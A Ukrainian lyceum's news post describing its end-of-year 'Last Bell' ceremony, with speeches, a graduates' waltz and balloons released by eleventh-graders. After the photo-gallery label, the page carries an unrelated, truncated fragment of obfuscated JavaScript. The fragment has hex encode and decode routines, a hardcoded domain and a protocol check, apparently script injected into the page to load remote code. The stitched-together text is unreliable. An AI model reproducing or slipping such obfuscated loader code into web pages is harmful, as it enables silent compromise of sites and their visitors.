У травні, коли розквітають яскраві квіти і дзвенить пташиний спів, теплий весняний вітер приносить до нас свято Останнього дзвоника – традиційного свята ліцеїстів, педагогічного колективу та батьків, яке завершує навчальний марафон року.

З різнобарвними букетами квітів у святковій формі та у вишиванках зібрались ліцеїсти на урочистій лінійці.

З вітальним словом до присутніх звернувся директор ліцею Киричков Юрій Васильович.

Випускники у зворушливому вальсі попрощалися з ліцейним життям, а першокласники звернулись до них із найщирішими побажаннями.

Наприкінці урочистої лінійки, коли усі раділи звучанню останнього дзвоника та під гучні оплески присутніх, одинадцятикласники запустили в небо кульки, що символізувало їхній вихід у вільне плавання.

Це свято завжди залишиться одним з найбільш незабутніх і зворушливих, тож нехай ця пам’ять буде світлою!

Вітаємо усіх із успішним закінченням ще одного навчального року, який кожному подарував нові знання, нові враження, нові думки і почуття! ФОТОГАЛЕРЕЯ

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "pl.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e